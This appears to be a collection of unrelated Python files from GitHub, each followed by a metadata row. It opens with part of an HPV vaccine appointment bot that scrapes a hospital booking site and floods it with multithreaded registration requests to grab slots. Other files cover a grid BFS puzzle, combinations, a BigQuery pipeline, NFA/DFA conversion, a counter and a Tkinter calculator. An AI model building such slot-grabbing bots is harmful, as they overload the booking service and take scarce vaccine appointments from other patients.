        # A third request: submit the form data.
        req = request.Request(url=posturl, headers=headers, data=data)
        response = request.urlopen(req)
        date = response.read().decode('utf-8')
        if date == "":
            return 0
        else:
            # Keep the raw response for debugging / later parsing.
            with open('post.html', 'w') as f:
                f.writelines(date)
            return date
    except:
        return 0
def FuckYou(date):
    """Submit the final registration form parsed out of the booking response.

    ``date`` is the response text returned by :func:`postpack`. Returns the
    confirmation response text, or 0 on any failure.
    """
    global csrf, global_regToken, global_specCode, data2, time1, time2
    global ap
    try:
        # Build the registration URL field by field.
        url = "https://sych.xiaoerfang.cn/sychwx/index.php?"
        r = "pool/reg2"
        _csrf = csrf
        searchObj = re.search(r'PutRegForm\[ptId\]\\" value=\\"(.*?)\\">', date, re.M | re.I)
        PutRegForm_ptId = searchObj.group(1)
        PutRegForm_visitingDate = data2
        PutRegForm_doctorName = ""
        PutRegForm_deptId = "442"
        # URL-encoded department name selecting the vaccination clinic.
        PutRegForm_deptName = "%E7%96%AB%E8%8B%97%E6%8E%A5%E7%A7%8D%E9%97%A8%E8%AF%8A"
        PutRegForm_specCode = global_specCode[ap]
        PutRegForm_specName = ""
        searchObj = re.search(r'PutRegForm\[orderChannel\]\\" value=\\"(.*?)\\">', date, re.M | re.I)
        PutRegForm_orderChannel = searchObj.group(1)
        PutRegForm_regToken = global_regToken[ap]
        PutRegForm_doctorCode = ""
        PutRegForm_startTime = time1
        PutRegForm_endTime = time2
        PutRegForm_doctorFlag = ""
        PutRegForm_doctorName = ""
        PutRegForm_doctorCode = ""
        url = url + "r=" + r
        url = url + "&_csrf=" + _csrf
        url = url + "&PutRegForm[ptId]=" + PutRegForm_ptId
        url = url + "&PutRegForm[visitingDate]=" + PutRegForm_visitingDate
        url = url + "&PutRegForm[doctorName]=" + quote(PutRegForm_doctorName, 'utf-8')
        url = url + "&PutRegForm[deptId]=" + PutRegForm_deptId
        url = url + "&PutRegForm[deptName]=" + PutRegForm_deptName
        url = url + "&PutRegForm[specCode]=" + PutRegForm_specCode
        url = url + "&PutRegForm[specName]=" + PutRegForm_specName
        url = url + "&PutRegForm[orderChannel]=" + PutRegForm_orderChannel
        url = url + "&PutRegForm[regToken]=" + PutRegForm_regToken
        url = url + "&PutRegForm[doctorCode]=" + PutRegForm_doctorCode
        url = url + "&PutRegForm[startTime]=" + PutRegForm_startTime
        url = url + "&PutRegForm[endTime]=" + PutRegForm_endTime
        url = url + "&PutRegForm[doctorFlag]=" + "&PutRegForm[doctorName]=" + "&PutRegForm[doctorCode]="
        # The fourth request: finalize the registration.
        req = request.Request(url=url, headers=headers, method='GET')
        response = request.urlopen(req)
        data = response.read().decode('utf-8')
        print(data)
        if data == "":
            with open('fuck.html', 'w') as f:
                f.writelines(data)
            return 0
        else:
            with open('fuck.html', 'w') as f:
                f.writelines(data)
            return data
    except:
        return 0
def multiT():
    """Worker loop: parse slot parameters, POST the booking, then confirm it.

    Each stage retries forever until it succeeds, logging every attempt with a
    timestamp. Fix: the failure branch of the first stage previously logged the
    success message ("获取展开连接成功"); it now logs the failure message.
    """
    res = ""
    while True:
        dt = datetime.now()
        str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
        res = expand(specname="宫颈癌九价疫苗门诊", url=dataurl)
        if res != 0:
            str1 = str1 + " " + "获取展开连接成功"
            print(str1)
            wrLog("获取展开连接成功")
            print(res)
            break
        else:
            str1 = str1 + " " + "获取展开连接失败"
            print(str1)
            # Bug fix: was wrLog("获取展开连接成功") — logged success on failure.
            wrLog("获取展开连接失败")
            continue
    while True:
        dt = datetime.now()
        str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
        # NOTE(review): postpack returns "" when no csrf token is available;
        # "" != 0, so that case is treated as success here — confirm intended.
        res = postpack(posturl)
        if res != 0:
            str1 = str1 + " " + "POST成功"
            print(str1)
            wrLog("POST成功")
            print(res)
            break
        else:
            str1 = str1 + " " + "POST失败"
            print(str1)
            wrLog("POST失败")
            continue
    while True:
        dt = datetime.now()
        str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
        # NOTE(review): on failure res becomes 0, so later retries call
        # FuckYou(0), which can never succeed — confirm intended.
        res = FuckYou(res)
        if res != 0:
            str1 = str1 + " " + "FUCK成功"
            print(str1)
            wrLog("FUCK成功")
            print(res)
            break
        else:
            str1 = str1 + " " + "FUCK失败"
            print(str1)
            wrLog("FUCK失败")
            continue
def multiP(t1, t2, app):
    """Configure the global time slot, then spawn four booking worker threads."""
    # Initialize the time-slot parameters
    global time1, time2, ap
    time1 = t1
    time2 = t2
    ap = app
    print("time1: ", time1, "time2: ", time2, "ap: ", ap)
    try:
        # Start four worker threads
        _thread.start_new_thread(multiT, ())
        _thread.start_new_thread(multiT, ())
        _thread.start_new_thread(multiT, ())
        _thread.start_new_thread(multiT, ())
    except:
        print("Error: 无法启动线程")
    while 1:
        # Busy-wait to keep this process (and its worker threads) alive.
        pass
def regTokenHTMLP():
    # Endless refresher loop: keep the cached regToken.html up to date.
    while True:
        regTokenHTML(specname="宫颈癌九价疫苗门诊", url=dataurl)
def init():
    """Load the session cookie from the local ``cookie`` file into the headers."""
    global headers
    cookie_path = "cookie"
    if os.path.exists(cookie_path):
        print("File cookie already exist!")
        with open(cookie_path, 'r') as cookie_file:
            headers['Cookie'] = cookie_file.read()
    print(headers)
# Generate formatted dates for today and the following seven days
def getDay(days=8):
    """Return ISO-formatted (YYYY-MM-DD) dates for today plus the next ``days - 1`` days.

    Bug fix: the previous implementation incremented the day-of-month digits as
    text, producing invalid dates (e.g. '2021-11-32') near the end of a month.
    ``date`` + ``timedelta`` handles month and year rollover correctly. The new
    ``days`` parameter defaults to the original window of 8 dates.
    """
    from datetime import date, timedelta
    today = date.today()
    return [(today + timedelta(days=offset)).isoformat() for offset in range(days)]
# E-mail notification service
def mail(inbox, data):
    """Send a notification e-mail with subject ``data`` to ``inbox`` via QQ SMTP."""
    dt = datetime.now()
    str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
    # Sender account: address and QQ-mail authorization code.
    # NOTE(review): credentials are hard-coded placeholders; load them from the
    # environment or a config file before real use.
    from_addr = 'xxxxx@qq.com'
    password = 'xxxxxxx'
    # Recipient mailbox
    to_addr = inbox
    # Outgoing SMTP server
    smtp_server = 'smtp.qq.com'
    # Message body: first arg is the content, second the subtype ('plain' for
    # plain text), third the encoding.
    msg = MIMEText(str1 + " send by HPV-Hijack ", 'plain', 'utf-8')
    # Message header fields
    msg['From'] = Header('HPV-Hijack')
    msg['To'] = Header(to_addr)
    msg['Subject'] = Header(data)
    try:
        # Open the sending service over an encrypted (SSL) connection
        server = smtplib.SMTP_SSL(smtp_server)
        server.connect(smtp_server, 465)
        # Log in to the sender mailbox
        server.login(from_addr, password)
        # Send the mail
        server.sendmail(from_addr, to_addr, msg.as_string())
        # Close the connection
        server.quit()
        str1 = "邮件发送成功 发送地址邮箱地址为: " + to_addr
        wrLog(str1)
    except smtplib.SMTPException:
        str1 = "Error: 无法发送邮件 " + to_addr
        wrLog(str1)
# Check slot availability for the coming days
def checkNumber(url=dataurl, headers=headers):
    """Scan the next 8 days; return the first date string with an open slot, else 0.

    Sends a notification e-mail to ``inbox`` when an open slot is found.
    NOTE(review): the locals ``list`` and ``str`` shadow the builtins.
    """
    list = getDay()
    for i in list:
        dayurl = url + i
        try:
            req = request.Request(url=dayurl, headers=headers, method='GET')
            # req = proxiesrequest(dayurl, headers, 'GET')
            wrLog("抓取URL:" + dayurl + "成功")
        except:
            wrLog("抓取URL:" + dayurl + "失败")
            continue
        response = request.urlopen(req)
        # time.sleep(0.1)
        data = response.read().decode('utf-8')
        selector = html.etree.HTML(data)
        # Scrape the time-slot labels
        title = selector.xpath(
            '//*[@id="collapse3"]/div[@class="weui-media-box__bd item-detail"]/div[@class="weui-cell"]/div['
            '@class="weui-cell__bd"]/table[@class="cell__bd_td"]/tr/td/p/text()')
        dt = datetime.now()
        str1 = dt.strftime('%Y-%m-%d %H:%M:%S %f')
        time.sleep(0.1)
        if title == []:
            print(str1 + i + "当天无号")
            wrLog(i + "当天无号")
            continue
        # print(title)
        # Scrape the slot status labels
        state = selector.xpath(
            '//*[@id="collapse3"]/div[@class="weui-media-box__bd item-detail"]/div[@class="weui-cell"]/div['
            '@class="weui-cell__bd"]/table[@class="cell__bd_td"]/tr/td/p/span/text()')
        # print(state)
        index = 0
        for j in title:
            title[index] = j[:2]
            index = index + 1
        # print(title)
        index = 0
        for k in state:
            str = i + " " + title[index] + " " + state[index]
            #print(title[index])
            #print(state[index])
            if state[index] != "约满" and state[index] != "无号":
                print(str1 + "当天有号")
                print(str)
                mail(inbox, str)
                return i
            else:
                print(str1 + i + "当天无号")
            index = index + 1
    return 0
def main1():
    """Spawn the regToken refresher plus one booking process per time slot."""
    init()
    # Process that keeps refreshing the cached regToken.html
    p1 = Process(target=regTokenHTMLP, args=(), kwargs={})
    # Morning booking processes (ap == 0)
    t1 = "09:30"
    t2 = "10:00"
    app = 0
    am930 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
    t1 = "10:00"
    t2 = "10:30"
    am10 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
    t1 = "10:30"
    t2 = "11:00"
    am1030 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
    t1 = "11:00"
    t2 = "11:30"
    am110 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
    t1 = "11:30"
    t2 = "12:00"
    am1130 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
    # Afternoon booking processes (ap == 1)
    t1 = "13:00"
    t2 = "13:30"
    app = 1
    pm130 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
    t1 = "13:30"
    t2 = "14:00"
    pm1330 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
    t1 = "14:00"
    t2 = "14:30"
    pm140 = Process(target=multiP, args=(t1, t2, app,), kwargs={})
    p1.start()  # start the refresher process first
    #time.sleep(0.5)
    am930.start()  # start the first booking process
    #time.sleep(0.5)
    am10.start()
    #time.sleep(0.5)
    am1030.start()
    #time.sleep(0.5)
    am110.start()
    #time.sleep(0.5)
    am1130.start()
    #time.sleep(0.5)
    pm130.start()
    #time.sleep(0.5)
    pm1330.start()
    #time.sleep(0.5)
    pm140.start()
def main2():
    """Poll availability once per second; on success set data1/data2 and return."""
    global data1, data2
    while True:
        time.sleep(1)
        try:
            res = checkNumber(url=dataurl, headers=headers)
            if res != 0:
                data1 = res
                tmp = ""
                # Strip the '-' separators (positions 4 and 7) to get YYYYMMDD.
                for i in range(0, len(res)):
                    if i != 4 and i != 7:
                        tmp = tmp + res[i]
                data2 = tmp
                break
        except:
            continue
    return
if __name__ == '__main__':
    # Poll until a date with open slots is found, then launch the booking processes.
    main2()
    main1()
| June-xiaowu/Beijing-HPV | SYFYBJY/JL.py | JL.py | py | 18,672 | python | en | code | 3 | github-code | 90 |
5544490482 | # 미네랄
# Review notes: attempt 2, 02:00:00 spent, needs a third review
import sys
from collections import deque
si = sys.stdin.readline
# Grid size: R rows, C columns.
R, C = map(int, si().split())
graph = []
for i in range(R):
    tmp = list(map(str, si().rstrip()))
    graph.append(tmp)
# N throws, each given as a height measured from the bottom of the grid.
N = int(si())
height_list = list(map(int, si().split()))
# How do we detect that a mineral chunk is floating?
# Run BFS and check whether the chunk reaches the bottom row (the ground).
def delete_mineral(check_left_right):
    """Remove the first mineral hit by a throw along row ``height`` (module global).

    ``check_left_right`` == 1 means the throw comes from the left side,
    otherwise from the right. Mutates the global ``graph`` and returns
    [row, col] of the removed mineral, or [-1, -1] if nothing was hit.
    """
    # Scan direction depends on which side the stick is thrown from.
    if check_left_right == 1:  # thrown from the left
        index = 0
        while True:
            if index == C:
                break
            if graph[height][index] == 'x':
                graph[height][index] = '.'
                return [height, index]
            else:
                index += 1
    else:
        index = C-1
        while True:
            if index == -1:
                break
            if graph[height][index] == 'x':
                graph[height][index] = '.'
                return [height, index]
            else:
                index -= 1
    return [-1, -1]
def bfs(x, y):
    """Flood-fill the mineral chunk containing (x, y).

    Returns True if the chunk is floating (never touches the bottom row),
    False otherwise. Marks the chunk in the module-global ``visited`` grid
    as a side effect.
    """
    flag = True
    q = deque()
    q.append([x, y])
    visited[x][y] = 1  # mark the start cell visited
    while q:
        x, y = q.popleft()
        if x == R-1:  # the chunk touches the ground, so it is not a floating cluster
            flag = False
        for i in range(4):
            nx, ny = x + dx[i], y + dy[i]
            if not (0 <= nx < R and 0 <= ny < C): continue
            if visited[nx][ny] == 0 and graph[nx][ny] == 'x':
                q.append([nx, ny])
                visited[nx][ny] = 1
    return flag
# Four-neighbour offsets (up, down, left, right) used by the BFS.
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
check_left_right = 1
for height in height_list:
    # Bug fix: isCluster must be reset for every throw. Previously it was only
    # assigned inside the neighbour loop, so a throw that removed nothing (or a
    # mineral with no mineral neighbours) raised a NameError on the first
    # iteration and reused a stale value on later ones.
    isCluster = False
    height = R - height  # convert the 1-based height to our 0-based row index
    # Remove the mineral hit by this throw (direction alternates each turn).
    check_break = delete_mineral(check_left_right)
    # Alternate the throwing side for the next throw.
    check_left_right = (-1) * check_left_right
    # Check the shape of the minerals around the removed one.
    if check_break != [-1, -1]:  # something was removed
        # Inspect the four neighbours as cluster candidates.
        x, y = check_break
        for idx in range(4):
            nx, ny = x + dx[idx], y + dy[idx]
            if not (0 <= nx < R and 0 <= ny < C): continue
            if graph[nx][ny] == '.': continue  # only minerals can form a cluster
            visited = [[0 for i in range(C)] for i in range(R)]
            isCluster = bfs(nx, ny)
            if isCluster:
                break
    # Drop the floating cluster, if one was found.
    if isCluster:
        down_point = 1000
        for i in range(R):
            for j in range(C):
                if visited[i][j] == 1:
                    tmp = 0
                    cnt = 1
                    while True:
                        if visited[i+cnt][j] == 1:  # same cluster below: stop scanning
                            break
                        if graph[i+cnt][j] == 'x':  # another mineral below: limit the drop
                            down_point = min(down_point, tmp)
                            break
                        if i+cnt == R-1:
                            down_point = min(down_point, cnt)
                            break
                        if visited[i+cnt][j] != 1 and graph[i+cnt][j] == '.':  # free cell below
                            tmp += 1
                        cnt += 1
        # Move the cluster down bottom-up so cells are not overwritten.
        for i in range(R-1, -1, -1):
            for j in range(C):
                if visited[i][j] == 1:
                    graph[i+down_point][j] = graph[i][j]
                    graph[i][j] = '.'
for i in graph:
    print("".join(i))
23297016518 | # -*- coding: UTF-8 -*-
class Solution:
    """LeetCode 77 – enumerate all k-combinations of 1..n via backtracking."""

    def combine(self, n, k):
        """Return all combinations of k numbers from 1..n, in lexicographic order."""
        self.result = []
        self.tmp = []
        self.dfs(n, k, 1)
        return self.result

    def dfs(self, n, k, startIndex):
        """Extend the partial combination ``self.tmp`` starting at ``startIndex``."""
        if len(self.tmp) == k:
            # A full combination has been built; store a copy of it.
            self.result.append(self.tmp[:])
            return
        # Prune: stop once too few candidates remain to reach length k.
        upper = n + 2 - (k - len(self.tmp))
        for candidate in range(startIndex, upper):
            self.tmp.append(candidate)
            self.dfs(n, k, candidate + 1)
            self.tmp.pop()
# Smoke test: print all 2-combinations of 1..4.
s = Solution()
print(s.combine(4,2))
13395145348 | import json
import os
from pathlib import Path
from typing import List
import pandas as pd
from prefect import flow, get_run_logger, task
# Istanbul traffic-density CSV resources, keyed by month.
URLS = {
    "jan": "https://data.ibb.gov.tr/dataset/3ee6d744-5da2-40c8-9cd6-0e3e41f1928f/resource/db9c7fb3-e7f9-435a-92f4-1b917e357821/download/traffic_density_202001.csv",
    "feb": "https://data.ibb.gov.tr/dataset/3ee6d744-5da2-40c8-9cd6-0e3e41f1928f/resource/5fb30ee1-e079-4865-a8cd-16efe2be8352/download/traffic_density_202002.csv",
    "mar": "https://data.ibb.gov.tr/dataset/3ee6d744-5da2-40c8-9cd6-0e3e41f1928f/resource/efff9df8-4f40-4a46-8c99-2b3b4c5e2b8c/download/traffic_density_202003.csv",
}
# Local directory where the downloaded parquet files are stored.
BASE_DIR = "data/traffic"
CREDENTIAL_FILE = "credentials/python-workshop-369005-24786d080402.json"
# Point the Google SDK at the service-account credentials (import-time side effect).
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = CREDENTIAL_FILE
@task
def prereq():
    # Ensure the local download directory exists before any download task runs.
    Path(BASE_DIR).mkdir(parents=True, exist_ok=True)
@task
def download_csv(month: str, url: str, overwrite: bool = False) -> Path:
    """Download the url csv and store it in parquet format"""
    logger = get_run_logger()
    target_path = Path(BASE_DIR) / f"{month}.parquet"
    logger.info(f"Checking for target path {target_path}")
    # Skip the download when the parquet file already exists, unless forced.
    if (not target_path.exists()) or overwrite:
        traffic = pd.read_csv(url)
        traffic.to_parquet(target_path)
        logger.info(f"Download Complete: {month} ({target_path})")
    else:
        logger.info(f"{month} data is already downloaded in {target_path}")
    return target_path
def get_project_id() -> str:
    """Read the GCP project id out of the service-account credential JSON file."""
    with open(CREDENTIAL_FILE) as handle:
        return json.load(handle)["project_id"]
@task
def upload_to_bq(path: Path) -> int:
    """Load a local parquet file into BigQuery table ``traffic.<file stem>``.

    The destination table is replaced if it already exists.
    Returns the number of rows loaded.
    """
    logger = get_run_logger()
    logger.info(f"Start uploading {path} to BQ")
    traffic = pd.read_parquet(path)
    table_name = f"traffic.{path.stem}"
    project_id = get_project_id()
    traffic.to_gbq(table_name, project_id=project_id, if_exists="replace")
    logger.info(
        f"{len(traffic)} rows are loaded (maybe overwritten) into {table_name} @ project {project_id}"
    )
    return len(traffic)
@flow
def traffic_flow():
    """Download each month's CSV, then load every parquet file into BigQuery."""
    logger = get_run_logger()
    prereq()
    paths: List = []
    for month, url in URLS.items():
        # .submit() returns a PrefectFuture rather than a Path; presumably
        # Prefect resolves it when passed to upload_to_bq below — TODO confirm.
        parquet_path = download_csv.submit(month, url)
        paths.append(parquet_path)
    total_rows = 0
    for path in paths:
        total_rows += upload_to_bq(path)
    logger.info(f"Total number of traffic data loaded into bq: {total_rows}")
# Script entry point: run the flow once.
if __name__ == "__main__":
    traffic_flow()
| husnusensoy/python-workshop | week9/afternoon/traffic.py | traffic.py | py | 2,517 | python | en | code | 2 | github-code | 90 |
26643674954 | import copy
class NFA:
    """Thin wrapper around an NFA description dict (transitions/accept_states/start)."""

    def __init__(self, description):
        self.transitions = description['transitions']
        self.accept_states = description['accept_states']
        self.start = description['start']

    def is_accept(self, string):
        """Return True if any character of `string` names an accept state."""
        return any(symbol in self.accept_states for symbol in string)

    def get_lambda_moves(self, state):
        """Return the set of states reachable from `state` by a λ-transition."""
        moves = self.transitions[state]
        if 'λ' in moves:
            return set(moves['λ'])
        return set()

    def transition(self, state, symbol):
        """Return the set of states reachable from `state` on input `symbol`."""
        table = self.transitions
        if state in table and symbol in table[state]:
            return set(table[state][symbol])
        return set()
class Helper:
    """Mutating helpers for the NFA→DFA constructions below.

    NOTE(review): every method here is invoked as ``Helper.method(nfa, ...)``,
    i.e. with an NFA instance bound to `self`, so ``self.transitions`` refers
    to that NFA's transition table — confirm this unusual calling convention
    before refactoring.
    """
    def sorter(self, dfa_description):
        # Canonicalize each '0'/'1' target set into a sorted string;
        # empty targets are renamed to the literal "Dead state".
        for state in dfa_description['transitions'].keys():
            dfa_description['transitions'][state]['0'] = ''.join(sorted(dfa_description['transitions'][state]['0']))
            if dfa_description['transitions'][state]['0'] == "":
                dfa_description['transitions'][state]['0'] = "Dead state"
            dfa_description['transitions'][state]['1'] = ''.join(sorted(dfa_description['transitions'][state]['1']))
            if dfa_description['transitions'][state]['1'] == "":
                dfa_description['transitions'][state]['1'] = "Dead state"
    def append_lambda_moves(self, current_transition, current, dfa_description):
        # Extend the '0' and '1' target sets with one step of λ-moves from each
        # target, then record the finished transition in dfa_description.
        lambda_set = set()
        for state in current_transition[current]['0']:
            lambda_set = lambda_set.union(NFA.get_lambda_moves(self, state))
        current_transition[current]['0'] = current_transition[current]['0'].union(lambda_set)
        lambda_set.clear()
        for state in current_transition[current]['1']:
            lambda_set = lambda_set.union(NFA.get_lambda_moves(self, state))
        current_transition[current]['1'] = current_transition[current]['1'].union(lambda_set)
        dfa_description['transitions'].update(current_transition)
    def append_2_to_transition(self, delete_states, update_states):
        # Rename every state key of self.transitions by appending '2';
        # delete_states/update_states are filled as scratch maps for the caller.
        for state in self.transitions:
            old = self.transitions[state]
            delete_states[state] = old
            new = {f'{state}2': old}
            update_states[state] = new
        for state in delete_states:
            if state in self.transitions:
                del self.transitions[state]
        for state in update_states:
            self.transitions.update(update_states[state])
    def append_2_to_inner_transition(self, inner_transitions):
        # Append '2' to every target-state name inside each transition entry.
        # NOTE(review): the same `inner_transitions` list object is shared and
        # never cleared between labels with more than one target, so later
        # multi-target labels accumulate earlier entries — confirm intent.
        for updated_state in self.transitions:
            for label in self.transitions[updated_state]:
                if len(self.transitions[updated_state][label]) == 1:
                    temp = ''.join(self.transitions[updated_state][label])
                    self.transitions[updated_state][label] = [f'{temp}2']
                if len(self.transitions[updated_state][label]) > 1:
                    for symbol in self.transitions[updated_state][label]:
                        temp = f'{symbol}2'
                        inner_transitions.append(temp)
                    self.transitions[updated_state][label] = inner_transitions
def to_dfa(nfa):
    """Subset construction: convert `nfa` into a DFA description dict.

    DFA states are strings whose characters are the contained NFA state names
    (sorted).  Helper.sorter later canonicalizes targets and renames empty
    targets to "Dead state".  Note: Helper/NFA methods are called with `nfa`
    bound as `self`.
    """
    dfa_description = {'transitions': {}, 'accept_states': [], 'start': ''}
    # 1) get start state (the NFA start plus its direct λ-targets)
    start_state = nfa.start
    if 'λ' in nfa.transitions[start_state].keys():
        start_state = start_state + ''.join(nfa.transitions[start_state]['λ'])
    dfa_description['start'] = ''.join(sorted(start_state))
    # 2) breadth-style worklist over composite states reachable from the start
    no_repeats = []
    todo = [start_state]
    while len(todo) != 0:
        current = ''.join(sorted(todo.pop()))
        if current in no_repeats:
            continue
        no_repeats.append(current)
        current_transition = {current: {'0': set(), '1': set()}}
        for state in current:
            #Get 1 and 0 transitions
            current_transition[current]['0'] = current_transition[current]['0'].union(NFA.transition(nfa, state, '0'))
            current_transition[current]['1'] = current_transition[current]['1'].union(NFA.transition(nfa, state, '1'))
        Helper.append_lambda_moves(nfa, current_transition, current, dfa_description) #get lambda moves
        #append the newly reached composite states to the worklist
        todo.append(''.join(current_transition[current]['0']))
        todo.append(''.join(current_transition[current]['1']))
    #Figure out which states are accept states
    for state in dfa_description['transitions']:
        if NFA.is_accept(nfa, state) == True:
            dfa_description['accept_states'].append(''.join(sorted(state)))
    Helper.sorter(nfa, dfa_description) #Sort key names and value names
    return dfa_description
def star_close(nfa):
    """Kleene-star construction: new start/accept state 'S' with λ-links both ways."""
    machine = copy.deepcopy(nfa)
    transitions = {'S': {'λ': [machine.start]}}
    transitions.update(machine.transitions)
    # Every original accept state loops back to the new start via λ.
    for state in machine.transitions:
        if state in machine.accept_states:
            transitions[state]['λ'] = ['S']
    return {'transitions': transitions, 'accept_states': ['S'], 'start': 'S'}
def union(nfa1, nfa2):
    """Union construction: new start 'S' with λ-moves into both machines.

    Every state of nfa2 is renamed with a trailing '2' so the two state sets
    cannot collide.  Returns a description dict for the combined NFA.
    """
    dfa_description = {'transitions': {}, 'accept_states': [], 'start': 'S'}
    dfa_description['transitions']['S'] = {'λ': [nfa1.start, f'{nfa2.start}2']}
    dfa_description['transitions'].update(nfa1.transitions)
    # NOTE(review): this appends nfa1.accept_states as a nested list, and the
    # whole accept_states value is overwritten again below — confirm intent.
    dfa_description['accept_states'].append(nfa1.accept_states)
    nfa2_copy = copy.deepcopy(nfa2)
    #label every state in second nfa with a 2
    delete_states = {}
    update_states = {}
    Helper.append_2_to_transition(nfa2_copy, delete_states, update_states)
    inner_transitions = []
    #label every state's transition in second nfa with a 2
    Helper.append_2_to_inner_transition(nfa2_copy, inner_transitions)
    new_accept_states = [i for i in nfa1.accept_states]
    #appending a 2 to each accept state
    for state in nfa2_copy.accept_states:
        new_accept_states.append(f'{state}2')
    nfa2_copy.accept_states = new_accept_states
    dfa_description['transitions'].update(nfa2_copy.transitions)
    dfa_description['accept_states'] = nfa2_copy.accept_states
    return dfa_description
def concatenate(nfa1, nfa2):
    """Concatenation construction: λ-link nfa1's accept states to nfa2's start.

    nfa2's states are renamed with a trailing '2' to avoid collisions with
    nfa1's state names.  Returns a description dict for the combined NFA.
    """
    dfa_description = {'transitions': {}, 'accept_states': [], 'start': ''}
    dfa_description['transitions'].update(nfa1.transitions)
    dfa_description['start'] = nfa1.start
    #label every state in second nfa with a 2
    nfa2_copy = copy.deepcopy(nfa2)
    delete_states = {}
    update_states = {}
    Helper.append_2_to_transition(nfa2_copy, delete_states, update_states)
    inner_transitions = []
    Helper.append_2_to_inner_transition(nfa2_copy, inner_transitions)
    dfa_copy = copy.deepcopy(dfa_description)
    #appending lambda moves to each of nfa1's accept states
    for state in dfa_description['transitions']:
        if state in nfa1.accept_states and 'λ' in dfa_description['transitions'][state]:
            dfa_copy['transitions'][state]['λ'].append(f'{nfa2_copy.start}2')
        if state in nfa1.accept_states and 'λ' not in dfa_description['transitions'][state]:
            dfa_copy['transitions'][state].update({'λ': [f'{nfa2_copy.start}2']})
    dfa_copy['transitions'].update(nfa2_copy.transitions)
    #appending a 2 to each accept state
    for state in nfa2_copy.accept_states:
        dfa_copy['accept_states'].append(f'{state}2')
    return dfa_copy
| Dsackler/Theory_Final_Project | Second_Idea/new_nfa.py | new_nfa.py | py | 7,733 | python | en | code | 0 | github-code | 90 |
class Counter:
    """A simple incrementing counter; the count lives in the `cnt` attribute."""

    def __init__(self):
        # Start at zero so increment()/display()/reset() work even when the
        # caller never invokes start_from() first (previously: AttributeError).
        self.cnt = 0

    def start_from(self, n=0):
        """Begin counting from the number n (default 0)."""
        self.cnt = n

    def increment(self):
        """Advance the counter by one."""
        self.cnt += 1

    def display(self):
        """Print the current counter value (message text is in Russian)."""
        print(f'Текущее значение счетчика = {self.cnt}')

    def reset(self):
        """Set the counter back to zero."""
        self.cnt = 0
# Demo: two independent counters keep separate state.
c1 = Counter()
c1.start_from()
c1.increment()
c1.increment()
c1.increment()
c1.display()
c2 = Counter()
c2.start_from(5)
c2.increment()
c2.display()
c1.display()
c2.reset()
c2.display()
c1.display()
c2.increment()
c2.display()
| gotcrab/oop_training | Counter.py | Counter.py | py | 575 | python | ru | code | 0 | github-code | 90 |
16678215032 | from tkinter import*
from PIL import Image,ImageTk
from tkinter import messagebox
class Register:
    """Tkinter window that computes mean, median and mode of user-entered numbers."""
    def __init__(self,root):
        self.root=root
        self.root.title("Registration")
        self.root.geometry("865x486+200+60")
        self.root.config(bg="white")
        #### Background image ####
        self.bg=ImageTk.PhotoImage(file="images/math.jpg")
        bg=Label(self.root,image=self.bg).place(x=0,y=0,relwidth=1,relheight=1)
        main_frame=Frame(self.root,bg="white")
        main_frame.place(x=60,y=60,width=750,height=400)
        # Title, prompt and the comma-separated number entry field.
        title=Label(main_frame,text="Mean Median Mode Calculator",font=("times new roman",25,"bold"),fg="lightgreen",bg="grey").pack() #.place(x=0,y=0,width=750)
        nums=Label(main_frame,text="Enter numbers for calculation with comma(,) separated",font=("times new roman",20,"bold"),fg="black",bg="white").place(x=60,y=90)
        nums_var=StringVar()
        txt_nums=Entry(main_frame,textvariable=nums_var,font=("times new roman",15),bg="lightgrey")
        txt_nums.place(x=60,y=140,width=500,height=30)
        # Result labels and their read-out entry boxes.
        mean=Label(main_frame,text="Mean :",font=("times new roman",25,"bold"),fg="black",bg="white").place(x=60,y=235)
        median=Label(main_frame,text="Median :",font=("times new roman",25,"bold"),fg="black",bg="white").place(x=60,y=280)
        mode=Label(main_frame,text="Mode :",font=("times new roman",25,"bold"),fg="black",bg="white").place(x=60,y=325)
        txt_mean=Entry(main_frame,font=("times new roman",15),bg="lightgrey")
        txt_mean.place(x=300,y=245)
        txt_median=Entry(main_frame,font=("times new roman",15),bg="lightgrey")
        txt_median.place(x=300,y=290)
        txt_mode=Entry(main_frame,font=("times new roman",15),bg="lightgrey")
        txt_mode.place(x=300,y=335)
        def calculate():
            # Button callback: parse the input string and fill the result boxes.
            try:
                if nums_var.get()=="":
                    messagebox.showerror("Error","Please enter numbers",parent=root)
                else:
                    ls=nums_var.get()
                    userlist=ls.split(",")
                    userlist=[int(i) for i in userlist]
                    meanvalue=str(Mean(userlist))
                    medianvalue=str(Median(userlist))
                    modevalue=str(Mode(userlist))
                    # NOTE(review): insert(5, ...) inserts at index 5, unlike the
                    # other two which insert at index 0 — confirm this is intended.
                    txt_mean.insert(5,meanvalue)
                    txt_median.insert(0,medianvalue)
                    txt_mode.insert(0,modevalue)
            except Exception as es:
                messagebox.showerror("Error",f"Error due to {str(es)}",parent=root)
        def Mean(list_of_num):
            # Arithmetic mean (raises ZeroDivisionError for an empty list).
            total=0
            for num in list_of_num:
                total+=num
            return total/len(list_of_num)
        def Mode(list_of_num):
            # NOTE(review): returns an (occurrence_count, value) tuple, and the
            # whole tuple is shown in the Mode box — confirm intended output.
            max_count=(0,0)
            for num in list_of_num:
                occurence=list_of_num.count(num)
                if occurence >max_count[0]:
                    max_count=(occurence,num)
            return max_count
        def Median(list_of_num):
            # Sorts the caller's list in place, then takes the middle element
            # (or the mean of the two middle elements for even lengths).
            list_of_num.sort()
            if len(list_of_num) %2!=0:
                middle_index=int((len(list_of_num)-1)/2)
                return list_of_num[middle_index]
            elif len(list_of_num)%2==0:
                middle_index1=int(len(list_of_num)/2)
                middle_index2=int(len(list_of_num)/2)-1
                return (list_of_num[middle_index1]+list_of_num[middle_index2])/2
        # NOTE(review): two overlapping "Calculate" buttons with the same
        # command are placed here — likely only one is needed.
        btn_submit=Button(main_frame,text="Calculate",command=calculate,font=("times new roman",14),cursor="hand2",bd=0,bg="lightgreen",fg="White").place(x=60,y=180,width=300,height=35)
